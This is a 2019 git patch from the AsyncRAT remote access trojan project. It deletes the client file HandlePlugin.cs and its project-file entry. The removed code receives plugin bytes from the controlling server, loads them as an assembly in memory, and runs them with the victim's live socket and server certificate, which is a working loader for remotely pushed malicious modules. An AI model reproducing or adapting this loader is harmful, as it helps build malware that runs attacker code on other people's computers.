From ce12c0f66b48a79d910a6b10d3b2457769f3ed06 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Sat, 22 Jun 2019 19:46:03 +0300 Subject: [PATCH] Update --- AsyncRAT-C#/AsyncRAT-C#/Client/Client.csproj | 1 - .../Client/Handle Packet/HandlePlugin.cs | 32 ------------------- 2 files changed, 33 deletions(-) delete mode 100644 AsyncRAT-C#/Client/Handle Packet/HandlePlugin.cs diff --git a/AsyncRAT-C#/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/AsyncRAT-C#/Client/Client.csproj index 5ea91bf..0afea06 100644 --- a/AsyncRAT-C#/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/AsyncRAT-C#/Client/Client.csproj @@ -127,7 +127,6 @@ - diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlePlugin.cs b/AsyncRAT-C#/Client/Handle Packet/HandlePlugin.cs deleted file mode 100644 index 985ed68..0000000 --- a/AsyncRAT-C#/Client/Handle Packet/HandlePlugin.cs +++ /dev/null @@ -1,32 +0,0 @@ -using Client.MessagePack; -using Client.Connection; -using System; -using System.Threading; -using System.Reflection; -using System.Diagnostics; -using Client.Helper; - -namespace Client.Handle_Packet -{ - public class HandlePlugin - { - public HandlePlugin(MsgPack unpack_msgpack) - { - new Thread(delegate () - { - try - { - Assembly plugin = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes()); - MethodInfo meth = plugin.GetType("Plugin.Plugin").GetMethod("Initialize"); - meth.Invoke(null, new object[] { ClientSocket.TcpClient, Settings.ServerCertificate }); - } - catch (Exception ex) - { - Debug.WriteLine(ex.Message); - Packet.Error(ex.Message); - } - }) - { IsBackground = true }.Start(); - } - } -}